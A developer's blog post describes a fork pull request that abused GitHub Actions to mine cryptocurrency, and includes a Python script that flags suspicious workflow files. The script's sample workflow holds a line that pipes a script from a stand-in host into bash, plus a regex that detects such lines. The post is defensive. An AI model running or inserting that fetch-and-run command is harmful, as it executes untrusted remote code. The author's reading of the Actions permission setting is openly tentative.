While scrolling through my GitHub feed I noticed a recent fork (5 hours ago) of a repo of mine.

Nothing so weird so far.

Out of curiosity I checked if the user wanted to make a decent PR and improve something in the code.

The user in fact made a new commit on their fork and added a new file. A new GitHub action.

Let me explain what happened.

tl;dr

Update: the two links below are unavailable since I reported the user and GitHub took action.

  • this is the pull request
  • in the “Files changed” tab you can clearly see that this is a mining attack abusing GitHub Actions
  • I don’t think this is directly harmful to the end-user, although it’s still shady af

What happened

This new user (account age is a few hours) forked one of my repos.

They opened a shady PR containing the following changes:

[image: malicious-action]

They only added a new GitHub Actions workflow, named Rowr.yml, that ran a mining script for 5 hours in a 20 job build matrix.

[image: matrix]

Here is the joyful script, mining away.

[image: miner]

Another thing I noticed was that they opened and closed the PR three times, to trigger multiple builds.

[image: runs]
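The pattern described above (a brand-new workflow file arriving in a fork PR, a pull_request trigger, a multi-hour timeout, a wide build matrix, and a step that fetches and executes a remote script) is easy to triage automatically before anyone clicks "Approve and run". The script below is an added example, not code from the original post; the sample PR contents are constructed, and the thresholds for "long" and "large" are assumptions chosen for illustration rather than GitHub defaults.

```python
"""Triage a pull request's changed files for workflow additions that match the
compute-abuse pattern from the post. Added example with constructed sample data;
thresholds are assumptions, not GitHub defaults."""
import re

WORKFLOW_DIR = ".github/workflows/"
LONG_JOB_MINUTES = 120   # assumption: anything this long deserves a look
LARGE_MATRIX = 10        # assumption: matrices this wide are unusual for a small repo

# Constructed sample PR: one new workflow plus one harmless source change.
SAMPLE_PR_FILES = {
    ".github/workflows/build.yml": {
        "status": "added",
        "content": """\
name: build
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 300
    strategy:
      matrix:
        slot: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    steps:
      - run: curl -sL https://example.invalid/payload.sh | bash
""",
    },
    "src/app.py": {"status": "modified", "content": "print('hello')\n"},
}

# "download something, pipe it straight into a shell" inside a run: step
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z|da)?sh\b")


def matrix_size(text):
    """Rough count of values nested under a 'matrix:' key (flow lists and block
    lists). It sums dimensions instead of multiplying them, which is enough to
    spot a deliberately wide matrix during triage."""
    lines = text.splitlines()
    total = 0
    for i, line in enumerate(lines):
        if line.strip() != "matrix:":
            continue
        indent = len(line) - len(line.lstrip())
        for sub in lines[i + 1:]:
            # the matrix block ends at the next line indented no deeper than 'matrix:'
            if sub.strip() and len(sub) - len(sub.lstrip()) <= indent:
                break
            flow = re.search(r"\[(.*)\]", sub)
            if flow:
                total += len([v for v in flow.group(1).split(",") if v.strip()])
            elif sub.lstrip().startswith("- "):
                total += 1
    return total


def triage_workflow(path, status, content):
    """Return the list of suspicious indicators found in one workflow file."""
    findings = []
    if status == "added":
        findings.append("new workflow file introduced by the PR")
    if re.search(r"\bpull_request(_target)?\b", content):
        findings.append("runs on pull_request events, i.e. on untrusted fork code")
    for m in re.finditer(r"timeout-minutes:\s*(\d+)", content):
        if int(m.group(1)) >= LONG_JOB_MINUTES:
            findings.append(f"long job timeout ({m.group(1)} min)")
    size = matrix_size(content)
    if size >= LARGE_MATRIX:
        findings.append(f"large build matrix (~{size} entries)")
    if FETCH_AND_RUN.search(content):
        findings.append("step downloads and pipes a remote script into a shell")
    return findings


def triage_pr(files):
    """Map each workflow path touched by the PR to its findings (empty = clean)."""
    report = {}
    for path, info in files.items():
        if not path.startswith(WORKFLOW_DIR):
            continue
        findings = triage_workflow(path, info["status"], info["content"])
        if findings:
            report[path] = findings
    return report


if __name__ == "__main__":
    for path, findings in triage_pr(SAMPLE_PR_FILES).items():
        print(path)
        for f in findings:
            print("  -", f)
```

In practice the `files` dict would be filled from the PR's changed-files listing; the point is that a single added file under `.github/workflows/` on a fork PR already warrants a human look, and the other indicators just rank how urgent that look is.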

Prevention of such abuse?

Surely reporting the user doesn’t hurt, although it won’t stop throw-away accounts from popping up and planting malicious code in GitHub Actions.

[image: report]

Another, maybe more effective, measure you can take is to change the GitHub Actions permissions to “Allow local actions only”.

I think this means that new GitHub Actions workflows added through a PR won’t be run automatically, but only once you merge the PR:

[image: actions-permissions]

Similar news elsewhere

Doing a quick search, I found other people reporting the same issue.

[image: comment]